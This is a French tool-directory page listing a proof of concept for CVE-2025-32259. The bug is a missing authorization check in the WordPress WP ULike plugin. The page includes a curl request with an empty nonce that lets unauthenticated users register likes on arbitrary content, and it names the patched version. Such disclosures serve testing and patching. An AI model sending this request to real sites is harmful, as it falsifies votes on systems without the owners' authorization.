Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Dans les versions affectées du plugin WP ULike, il n'y a pas de vérification d'autorisation appropriée avant d'autoriser certaines actions AJAX ou manipulations de vote. Cela permet aux utilisateurs non authentifiés d'interagir avec le plugin de manières que seuls les utilisateurs connectés devraient pouvoir faire — faussant potentiellement les votes ou injectant des données trompeuses.

Partager

WP ULike ≤ 4.7.9.1 - Spoof de contenu non authentifié (CVE-2025-32259)

🔬 Un PoC simple démontrant CVE-2025-32259 dans le plugin WP ULike pour WordPress.
🚨 Usage éducatif uniquement – ne testez pas sur des systèmes sans autorisation explicite.


🧠 Aperçu

WP ULike est un plugin WordPress populaire qui permet aux utilisateurs de liker du contenu sur un site. Les versions jusqu'à 4.7.9.1 souffrent d'une vulnérabilité d'absence d'autorisation, permettant à des utilisateurs non authentifiés de usurper des actions de « like » via des requêtes AJAX.

  • CVE : CVE-2025-32259
  • Versions vulnérables : ≤ 4.7.9.1
  • Version corrigée : 4.7.9.2

🚀 Preuve de concept

La vulnérabilité permet à des utilisateurs non authentifiés d'interagir avec le point de terminaison AJAX et de liker n'importe quel contenu (article, commentaire, etc.) sans autorisation.

🔧 Script PoC

root@kitploit:~
curl -X POST https://site-cible.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

Remplacez id=1 par un ID d'article valide.

Une réponse réussie pourrait ressembler à :
{"status":"success","msg":"You liked this."}
Télécharger l’outil